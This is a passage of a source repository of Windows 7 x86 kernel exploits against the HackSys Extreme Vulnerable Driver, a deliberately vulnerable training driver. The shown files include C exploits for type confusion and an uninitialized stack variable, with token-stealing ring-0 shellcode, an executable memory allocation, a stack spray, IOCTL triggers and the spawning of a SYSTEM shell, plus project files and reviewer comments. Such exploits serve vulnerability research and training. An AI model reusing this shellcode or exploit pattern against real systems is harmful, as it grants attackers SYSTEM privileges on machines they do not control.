Ptoken_User = (PTOKEN_USER)GlobalAlloc(GPTR, dwSize); 29 | 30 | // Call GetTokenInformation again to get the group information. 
31 | if (!GetTokenInformation(hToken, TokenUser, Ptoken_User, dwSize, &dwSize)) { 32 | return FALSE; 33 | } 34 | if (!ConvertSidToStringSidW(Ptoken_User->User.Sid, &SID)) { 35 | return FALSE; 36 | } 37 | 38 | if (_wcsicmp(L"S-1-5-18", SID) != 0) { 39 | return FALSE; 40 | } 41 | if (Ptoken_User) GlobalFree(Ptoken_User); 42 | 43 | return TRUE; 44 | } 45 | 46 | 47 | void PopShell() 48 | { 49 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 50 | PROCESS_INFORMATION pi; 51 | 52 | ZeroMemory(&si, sizeof(si)); 53 | si.cb = sizeof(si); 54 | ZeroMemory(&pi, sizeof(pi)); 55 | 56 | CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); 57 | 58 | } 59 | 60 | 61 | int wmain(int argc, wchar_t* argv[]) 62 | { 63 | OSVERSIONINFOEXW osInfo; 64 | TCHAR chOSMajorMinor[8]; 65 | LPVOID lpvPayload; 66 | HANDLE hDevice; 67 | LPCWSTR lpDeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver"; 68 | BOOL bResult = FALSE; 69 | 70 | CHAR ShellCode[] = "\x60" // pushad ; Save register state on the Stack 71 | "\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread 72 | "\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process 73 | "\x89\xC1" // mov ecx, eax (Current _EPROCESS structure) 74 | "\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token 75 | //---[Copy System PID token] 76 | "\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System 77 | "\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink 78 | "\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET | 79 | "\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId 80 | "\x75\xED" // jnz ->| ; Loop !(PID=4) 81 | "\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token 82 | "\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token 83 | //---[Recover] 84 | 
"\x61" // popad ; Restore register state from the Stack 85 | "\xC3" // ret 86 | ; 87 | 88 | wprintf(L" __ __ __ ____ \n"); 89 | wprintf(L" / // /__ _____/ /__ / __/_ _____ \n"); 90 | wprintf(L" / _ / _ `/ __/ '_/_\\ \\/ // (_-< \n"); 91 | wprintf(L" /_//_/\\_,_/\\__/_/\\_\\/___/\\_, /___/ \n"); 92 | wprintf(L" /___/ \n"); 93 | wprintf(L" \n"); 94 | wprintf(L" Extreme Vulnerable Driver \n"); 95 | wprintf(L" Type Confusion \n\n"); 96 | 97 | // Get OS Version/Architecture 98 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 99 | 100 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion) 101 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); 102 | if (RtlGetVersion == NULL) { 103 | wprintf(L" -> Unable to get Module handle!\n\n"); 104 | exit(1); 105 | } 106 | 107 | RtlGetVersion(&osInfo); 108 | 109 | swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); 110 | 111 | if (_wcsicmp(chOSMajorMinor, L"6.1") == 0 && sizeof(LPVOID) == 4) { 112 | wprintf(L" [*] Exploit running on Windows Version: 7 or Server 2008 x86 build %u \n\n", osInfo.dwBuildNumber); 113 | } 114 | else { 115 | wprintf(L" [!] 
This exploit has only been tested on Windows 7 x86 build 7601 \n\n"); 116 | exit(1); 117 | } 118 | 119 | wprintf(L" [*] Allocating Ring0 Payload"); 120 | 121 | lpvPayload = VirtualAlloc( 122 | NULL, // Next page to commit 123 | sizeof(ShellCode), // Page size, in bytes 124 | MEM_COMMIT | MEM_RESERVE, // Allocate a committed page 125 | PAGE_EXECUTE_READWRITE); // Read/write access 126 | if (lpvPayload == NULL) 127 | { 128 | wprintf(L" -> Unable to reserve Memory!\n\n"); 129 | exit(1); 130 | } 131 | 132 | wprintf(L" -> Done!\n"); 133 | 134 | memcpy(lpvPayload, ShellCode, sizeof(ShellCode)); 135 | 136 | wprintf(L" [+] Ring0 Payload available at: 0x%p \n\n", lpvPayload); 137 | wprintf(L" [*] Trying to get a handle to the following Driver: %ls", lpDeviceName); 138 | 139 | hDevice = CreateFile(lpDeviceName, // Name of the write 140 | GENERIC_READ | GENERIC_WRITE, // Open for reading/writing 141 | FILE_SHARE_WRITE, // Allow Share 142 | NULL, // Default security 143 | OPEN_EXISTING, // Opens a file or device, only if it exists. 144 | FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, // Normal file 145 | NULL); // No attr. 
template 146 | 147 | if (hDevice == INVALID_HANDLE_VALUE) 148 | { 149 | wprintf(L" -> Unable to get Driver handle!\n\n"); 150 | exit(1); 151 | } 152 | 153 | wprintf(L" -> Done!\n"); 154 | wprintf(L" [+] Our Device Handle: 0x%p \n\n", hDevice); 155 | 156 | wprintf(L" [*] Preparing USER_TYPE_CONFUSION_OBJECT Structure"); 157 | 158 | // Union Member Type Confusion https://www.tutorialspoint.com/cprogramming/c_unions.htm 159 | 160 | PUSER_TYPE_CONFUSION_OBJECT pTypeConfusion; 161 | pTypeConfusion = (PUSER_TYPE_CONFUSION_OBJECT)malloc(sizeof(USER_TYPE_CONFUSION_OBJECT)); 162 | 163 | pTypeConfusion->ObjectID = 0xB03FB03F; 164 | pTypeConfusion->ObjectType = (ULONG_PTR)lpvPayload; 165 | 166 | wprintf(L" -> Done!\n"); 167 | wprintf(L" [+] USER_TYPE_CONFUSION_OBJECT available at: 0x%p \n", pTypeConfusion); 168 | wprintf(L" [+] USER_TYPE_CONFUSION_OBJECT -> ObjectType Contains: 0x%p \n\n", (LPVOID)pTypeConfusion->ObjectType); 169 | 170 | wprintf(L" [*] Lets send some Bytes to our Driver"); 171 | 172 | DWORD junk = 0; // Discard results 173 | 174 | bResult = DeviceIoControl(hDevice, // Device to be queried 175 | 0x222023, // Operation to perform 176 | pTypeConfusion, sizeof(pTypeConfusion), // Input Buffer 177 | NULL, 0, // Output Buffer 178 | &junk, // # Bytes returned 179 | (LPOVERLAPPED)NULL); // Synchronous I/O 180 | if (!bResult) { 181 | wprintf(L" -> Failed to send Data!\n\n"); 182 | CloseHandle(hDevice); 183 | exit(1); 184 | } 185 | 186 | wprintf(L" -> Done!\n\n"); 187 | 188 | BOOL isGodMode = IsSystem(); 189 | if (!isGodMode) { 190 | wprintf(L" [!] Exploit Failed :( \n\n"); 191 | CloseHandle(hDevice); 192 | exit(1); 193 | } 194 | 195 | PopShell(); 196 | wprintf(L" [!] 
Enjoy your Shell and Thank You for Flying Ring0 Airways ;) \n\n");

    CloseHandle(hDevice);

    return (0);
}
-------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion/HS-TypeConfusion.h: --------------------------------------------------------------------------------
#pragma once

#include

/*
 * Input record handed to the type-confusion IOCTL by HS-TypeConfusion.c.
 * The .c fills ObjectID with the constant 0xB03FB03F and ObjectType with the
 * address of the ring-0 payload page (cast to ULONG_PTR).
 *
 * NOTE(review): both members are pointer-sized, so the record is 8 bytes on a
 * 32-bit build, but the DeviceIoControl call in HS-TypeConfusion.c passes
 * sizeof(pTypeConfusion) -- the size of the pointer variable, 4 bytes -- as the
 * input length rather than sizeof(USER_TYPE_CONFUSION_OBJECT).
 */
typedef struct _USER_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;

/*
 * Function-pointer type for ntdll!RtlGetVersion, which the .c resolves at run
 * time with GetProcAddress instead of linking against it.
 *
 * NOTE(review): an identifier that starts with an underscore followed by an
 * uppercase letter is reserved for the implementation in C; a project-specific
 * prefix would avoid the collision risk.
 */
typedef NTSTATUS(NTAPI *_RtlGetVersion)(
    LPOSVERSIONINFOEXW lpVersionInformation
);
-------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion/HS-TypeConfusion.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {B45D84E0-2352-4930-A4CD-786D7943A858} 23 | HSTypeConfusion 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | Unicode 32 | 33 | 34 | Application 35 | false 36 | v140 37 | true 38 | Unicode 39 | 40 | 41 | Application 42 | true 43 | v140 44 | Unicode 45 | 46 | 47 | Application 48 | false 49 | v140 50 | true 51 | Unicode 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | Level3 75 | Disabled 76 | true 77 | MultiThreaded 78 | 79 | 80 | 81 | 82 | Level3 83 | Disabled 84 | true 85 | MultiThreaded 86 | 87 | 88 | 89 | 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | MultiThreaded 96 | 97 | 98 | true 99 | true 100 | 101 | 102 | 103 | 104 | Level3 105 | MaxSpeed 106 | true 107 | true 108 | true 109 | MultiThreaded 110 | 111 | 112 | true 113 | true 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 |
-------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion/HS-TypeConfusion.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HS-UninitializedStackVariable", "HS-UninitializedStackVariable\HS-UninitializedStackVariable.vcxproj", "{DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Debug|x64.ActiveCfg = Debug|x64 17 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Debug|x64.Build.0 = Debug|x64 18 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Debug|x86.ActiveCfg = Debug|Win32 19 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Debug|x86.Build.0 = Debug|Win32 20 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Release|x64.ActiveCfg = Release|x64 21 | 
{DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Release|x64.Build.0 = Release|x64 22 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Release|x86.ActiveCfg = Release|Win32 23 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable/HS-UninitializedStackVariable.c: --------------------------------------------------------------------------------
#include
#include
#include
#include "HS-UninitializedStackVariable.h"


/*
 * IsSystem - report whether the calling process currently runs as LocalSystem.
 *
 * Reads the TokenUser information of the process token, converts the user SID
 * to its string form and compares it (case-insensitively) with "S-1-5-18", the
 * well-known LocalSystem SID. wmain() calls this after the IOCTL to decide
 * whether the token replacement done by the ring-0 payload took effect.
 *
 * Returns TRUE only when the SID matches; FALSE on any API failure or mismatch.
 *
 * NOTE(review): resource handling is best-effort. hToken is never closed on
 * any path, the string returned by ConvertSidToStringSidW is never released
 * with LocalFree, the GlobalAlloc result is dereferenced without a NULL check,
 * and the early FALSE returns skip the GlobalFree at the end. Harmless for a
 * process that exits right after, but worth knowing if this is ever reused.
 */
BOOL IsSystem(VOID)
{
    DWORD dwSize = 0, dwResult = 0;
    HANDLE hToken = NULL;
    PTOKEN_USER Ptoken_User;
    LPWSTR SID = NULL;

    // Open a handle to the access token for the calling process.
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        return FALSE;
    }

    // Call GetTokenInformation to get the buffer size.
    // With a NULL buffer the call is expected to fail with
    // ERROR_INSUFFICIENT_BUFFER and leave the required size in dwSize;
    // any other error code is a genuine failure.
    if (!GetTokenInformation(hToken, TokenUser, NULL, dwSize, &dwSize)) {
        dwResult = GetLastError();
        if (dwResult != ERROR_INSUFFICIENT_BUFFER) {
            return FALSE;
        }
    }

    // Allocate the buffer (GPTR = fixed, zero-initialised memory).
    Ptoken_User = (PTOKEN_USER)GlobalAlloc(GPTR, dwSize);

    // Call GetTokenInformation again to get the user information.
    if (!GetTokenInformation(hToken, TokenUser, Ptoken_User, dwSize, &dwSize)) {
        return FALSE;
    }
    if (!ConvertSidToStringSidW(Ptoken_User->User.Sid, &SID)) {
        return FALSE;
    }

    // S-1-5-18 is the well-known SID of the LocalSystem account.
    if (_wcsicmp(L"S-1-5-18", SID) != 0) {
        return FALSE;
    }
    if (Ptoken_User) GlobalFree(Ptoken_User);

    return TRUE;
}


/*
 * PopShell - start an interactive cmd.exe in a new console.
 *
 * wmain() only calls this after IsSystem() has confirmed the process token is
 * LocalSystem, so the new process is created under that token.
 *
 * NOTE(review): si is initialised twice (the designated initialiser already
 * sets cb before ZeroMemory/si.cb redo it); the CreateProcess return value is
 * ignored and the hProcess/hThread handles in pi are never closed. The empty
 * parameter list `()` is an old-style declaration; `(VOID)` would make it a
 * prototype.
 */
void PopShell()
{
    STARTUPINFO si = { sizeof(STARTUPINFO) };
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);

}


/*
 * wmain - entry point for the HEVD "Uninitialized Stack Variable" exercise.
 *
 * Flow, in order:
 *   1. Print a banner and refuse to run unless RtlGetVersion reports 6.1 and
 *      this is a 32-bit build (the payload offsets are specific to that).
 *   2. Commit an RWX page and copy the ring-0 payload (ShellCode) into it.
 *   3. Open the HEVD device.
 *   4. Fill a heap buffer with the payload address and pass it to
 *      NtMapUserPhysicalPages -- the "StackSpray" step the messages refer to;
 *      its return value is deliberately ignored.
 *   5. Send IOCTL 0x22202F with a single ULONG as the input buffer.
 *   6. Ask IsSystem() whether the token replacement happened; if so, PopShell().
 *
 * argc/argv are unused. Returns 0 on success; every failure path prints a
 * message and calls exit(1). lpvPayload and chStackSpray are never released;
 * the process exits right after, so this is a leak only on paper.
 */
int wmain(int argc, wchar_t* argv[])
{
    OSVERSIONINFOEXW osInfo;
    TCHAR chOSMajorMinor[8];                // "major.minor" as text, e.g. "6.1"
    LPVOID lpvPayload;                      // RWX page holding ShellCode
    HANDLE hDevice;                         // handle to the HEVD device
    LPCWSTR lpDeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver";
    BOOL bResult = FALSE;

    // Ring-0 payload. Every structure offset below is hard-coded for the
    // Windows 7 x86 build that the version check further down admits; the
    // per-line comments name the field each instruction touches.
    CHAR ShellCode[] = "\x60" // pushad ; Save register state on the Stack
        "\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread
        "\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process
        "\x89\xC1" // mov ecx, eax (Current _EPROCESS structure)
        "\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token
        //---[Copy System PID token]
        "\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System
        "\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink
        "\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET |
        "\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId
        "\x75\xED" // jnz ->| ; Loop !(PID=4)
        "\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token
        "\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token
        //---[Recover]
        "\x61" // popad ; Restore register state from the Stack
        "\xC3" // ret
        ;

    wprintf(L" __ __ __ ____ \n");
    wprintf(L" / // /__ _____/ /__ / __/_ _____ \n");
    wprintf(L" / _ / _ `/ __/ '_/_\\ \\/ // (_-< \n");
    wprintf(L" /_//_/\\_,_/\\__/_/\\_\\/___/\\_, /___/ \n");
    wprintf(L" /___/ \n");
    wprintf(L" \n");
    wprintf(L" Extreme Vulnerable Driver \n");
    wprintf(L" Uninitialized Stack Variable \n\n");

    // Get OS Version/Architecture
    osInfo.dwOSVersionInfoSize = sizeof(osInfo);

    // RtlGetVersion is resolved from ntdll at run time (see the typedef in the
    // header); GetProcAddress returning NULL is treated as fatal.
    _RtlGetVersion RtlGetVersion = (_RtlGetVersion)
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
    if (RtlGetVersion == NULL) {
        wprintf(L" -> Unable to get Module handle!\n\n");
        exit(1);
    }

    RtlGetVersion(&osInfo);

    // NOTE(review): swprintf_s takes the buffer size in *characters*, but
    // sizeof() yields bytes; with TCHAR == wchar_t this claims 16 slots for an
    // 8-element array. _countof(chOSMajorMinor) is the intended expression.
    // "%u.%u" for 6.1 fits either way, so the defect is latent here.
    swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);

    // 6.1 = Windows 7 / Server 2008 R2; sizeof(LPVOID) == 4 is a compile-time
    // check that this is a 32-bit build, which the payload offsets require.
    if (_wcsicmp(chOSMajorMinor, L"6.1") == 0 && sizeof(LPVOID) == 4) {
        wprintf(L" [*] Exploit running on Windows Version: 7 or Server 2008 x86 build %u \n\n", osInfo.dwBuildNumber);
    }
    else {
        wprintf(L" [!] This exploit has only been tested on Windows 7 x86 build 7601 \n\n");
        exit(1);
    }

    wprintf(L" [*] Allocating Ring0 Payload");

    // PAGE_EXECUTE_READWRITE because the page is written by memcpy below and
    // is later executed; the size request is rounded up to a page by the OS.
    lpvPayload = VirtualAlloc(
        NULL, // Next page to commit
        sizeof(ShellCode), // Page size, in bytes
        MEM_COMMIT | MEM_RESERVE, // Allocate a committed page
        PAGE_EXECUTE_READWRITE); // Read/write access
    if (lpvPayload == NULL)
    {
        wprintf(L" -> Unable to reserve Memory!\n\n");
        exit(1);
    }

    wprintf(L" -> Done!\n");

    memcpy(lpvPayload, ShellCode, sizeof(ShellCode));

    wprintf(L" [+] Ring0 Payload available at: 0x%p \n\n", lpvPayload);
    wprintf(L" [*] Trying to get a handle to the following Driver: %ls", lpDeviceName);

    // NOTE(review): the handle is opened with FILE_FLAG_OVERLAPPED, yet the
    // DeviceIoControl call below passes a NULL OVERLAPPED. The Win32 docs
    // require a valid OVERLAPPED for handles opened overlapped; dropping the
    // flag here would make the synchronous call well-defined.
    hDevice = CreateFile(lpDeviceName, // Device symbolic link to open
        GENERIC_READ | GENERIC_WRITE, // Open for reading/writing
        FILE_SHARE_WRITE, // Allow Share
        NULL, // Default security
        OPEN_EXISTING, // Opens a file or device, only if it exists.
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, // Normal file
        NULL); // No attr. template

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        wprintf(L" -> Unable to get Driver handle!\n\n");
        exit(1);
    }

    wprintf(L" -> Done!\n");
    wprintf(L" [+] Our Device Handle: 0x%p \n\n", hDevice);

    wprintf(L" [*] Preparing StackSpray Buffer");

    // Earlier 8-byte-per-slot variant, kept disabled for reference:
    /*
    CHAR *chStackSpray;
    chStackSpray = (CHAR *)malloc(8192);
    SecureZeroMemory(chStackSpray, 8192);
    for (unsigned int i = 0; i < 8192; i += 8)
        *(PULONG64)(chStackSpray + i) = (ULONG64)0x4141414142424242;
    */

    // Every 4-byte slot of the buffer receives the payload address.
    // NOTE(review): malloc is not checked for NULL before SecureZeroMemory
    // writes to it. 4196 looks like a typo for 4096; as written the loop's
    // last write is at offset 4192 and stays in bounds, and the 1024 entries
    // NtMapUserPhysicalPages is told about (4096 bytes on x86) fit as well.
    CHAR *chStackSpray;
    chStackSpray = (CHAR *)malloc(4196);
    SecureZeroMemory(chStackSpray, 4196);
    for (unsigned int i = 0; i < 4196; i += 4)
        *(PULONG)(chStackSpray + i) = (ULONG)lpvPayload;

    wprintf(L" -> Done!\n");
    wprintf(L" [+] StackSpray Buffer available at: 0x%p \n\n", chStackSpray);

    wprintf(L" [*] Lets spray the Stack and send the UserBuffer to our Driver");

    //ULONG64 ulUserValue = 0xB03FB03F;
    ULONG ulUserValue = 0xB03FB03F;
    LPVOID lpBuffer = &ulUserValue;

    // NtMapUserPhysicalPages is resolved from ntdll at run time (see header).
    _NtMapUserPhysicalPages NtMapUserPhysicalPages = (_NtMapUserPhysicalPages)
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtMapUserPhysicalPages");
    if (NtMapUserPhysicalPages == NULL) {
        wprintf(L" -> Unable to get Module handle!\n\n");
        exit(1);
    }

    // Return value intentionally ignored; the call is made for its side
    // effect only, immediately before the IOCTL (the ordering is presumably
    // load-bearing -- do not move statements between these two calls).
    NtMapUserPhysicalPages(NULL, 1024, (PULONG_PTR)chStackSpray);

    DWORD junk = 0; // Discard results

    // NOTE(review): sizeof(lpBuffer) is the size of the pointer, which only
    // equals sizeof(ulUserValue) because this is a 32-bit build;
    // sizeof(ulUserValue) is what is meant.
    bResult = DeviceIoControl(hDevice, // Device to be queried
        0x22202F, // Operation to perform (hard-coded HEVD control code)
        lpBuffer, sizeof(lpBuffer), // Input Buffer
        NULL, 0, // Output Buffer
        &junk, // # Bytes returned
        (LPOVERLAPPED)NULL); // Synchronous I/O
    if (!bResult) {
        wprintf(L" -> Failed to send Data!\n\n");
        CloseHandle(hDevice);
        exit(1);
    }

    wprintf(L" -> Done!\n\n");

    // Success is judged purely by whether the process token is now LocalSystem.
    BOOL isGodMode = IsSystem();
    if (!isGodMode) {
        wprintf(L" [!] Exploit Failed :( \n\n");
        CloseHandle(hDevice);
        exit(1);
    }

    PopShell();
    wprintf(L" [!] Enjoy your Shell and Thank You for Flying Ring0 Airways ;) \n\n");

    CloseHandle(hDevice);

    return (0);
}
-------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable/HS-UninitializedStackVariable.h: --------------------------------------------------------------------------------
#pragma once

#include

/*
 * Function-pointer types for the two ntdll exports that wmain() resolves at
 * run time with GetProcAddress instead of linking against them.
 *
 * NOTE(review): identifiers that start with an underscore followed by an
 * uppercase letter are reserved for the implementation in C; a project-specific
 * prefix would avoid the collision risk.
 */
typedef NTSTATUS(NTAPI *_RtlGetVersion)(
    LPOSVERSIONINFOEXW lpVersionInformation
);

// Called once from wmain() with (NULL, 1024, spray buffer); see the note there.
typedef NTSTATUS (NTAPI *_NtMapUserPhysicalPages)(
    PVOID VirtualAddress,
    ULONG_PTR NumberOfPages,
    PULONG_PTR UserPfnArray
);
-------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable/HS-UninitializedStackVariable.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF} 23 | HSUninitializedStackVariable 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | Unicode 32 | 33 | 34 | Application 35 | false 36 | v140 37 | true 38 | Unicode 39 | 40 | 41 | Application 42 | true 43 | v140 44 | Unicode 45 | 46 | 47 | Application 48 | false 49 | v140 50 | true 51 | Unicode 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | Level3 75 | Disabled 76 | true 77 | MultiThreaded 78 | 79 | 80 | 81 | 82 | Level3 83 | Disabled 84 | true 85 | MultiThreaded 86 | 87 | 88 | 89 | 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | MultiThreaded 96 | 97 | 98 | true 99 | true 100 | 101 | 102 | 103 | 104 
| Level3 105 | MaxSpeed 106 | true 107 | true 108 | true 109 | MultiThreaded 110 | 111 | 112 | true 113 | true 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable/HS-UninitializedStackVariable.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HSEVD-VariousExploits 2 | By Cn33liz 2018 3 | 4 | HackSys Extreme Vulnerable Driver - Various Windows 7 x86 Kernel Exploits 5 | 6 | * Integer Overflow 7 | * Null Pointer Dereference 8 | * TypeConfusion 9 | * Uninitialized Stack Variable 10 | --------------------------------------------------------------------------------